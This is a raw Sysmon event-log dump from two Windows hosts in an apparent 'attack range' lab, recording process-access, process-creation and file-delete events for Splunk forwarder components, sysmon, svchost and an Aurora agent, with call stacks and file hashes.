2.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016378Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.262{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016377Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.262{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016376Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.262{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016375Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.262{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016374Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.262{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016373Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.262{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E44C-63C7-0002-00000000B002}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016372Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.262{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E44C-63C7-0002-00000000B002}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016371Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.263{E5A8D418-E44C-63C7-0002-00000000B002}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016370Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.061{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=396A30201DA232024FE009BBFB9CA405,SHA256=3CC5B29DF1C17F551133DAD8E421113E861E9184712058DE642E5B98F5814821,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041681Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:32.595{FE4C2B44-E44C-63C7-2406-00000000AF02}30802520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041680Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:32.450{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E44C-63C7-2406-00000000AF02}3080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041679Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:32.449{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041678Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:32.449{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041677Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:32.448{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041676Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:32.448{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041675Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:32.448{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E44C-63C7-2406-00000000AF02}3080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041674Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:32.448{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E44C-63C7-2406-00000000AF02}3080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000041673Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:32.448{FE4C2B44-E44C-63C7-2406-00000000AF02}3080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000041672Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:32.212{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 23542300x800000000000000041671Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:32.150{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0370F895D008039965E1193C67590EFE,SHA256=C00DA58781ADC41D5909D29E96B95A6C01AA72872A166E90DC0085A41C74A888,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041700Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.970{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E82B86554DE3C71B320EE71A8E4B4FE,SHA256=A9B5E5272649B8FC844DB9D0844CCA983CBE2C4ED0EA758FAE6B1465D2F38A52,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041699Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.955{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E44D-63C7-2606-00000000AF02}6464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041698Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.955{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041697Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.955{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041696Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.955{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041695Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.955{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041694Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.955{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E44D-63C7-2606-00000000AF02}6464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041693Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.955{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E44D-63C7-2606-00000000AF02}6464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000041692Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.955{FE4C2B44-E44D-63C7-2606-00000000AF02}6464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 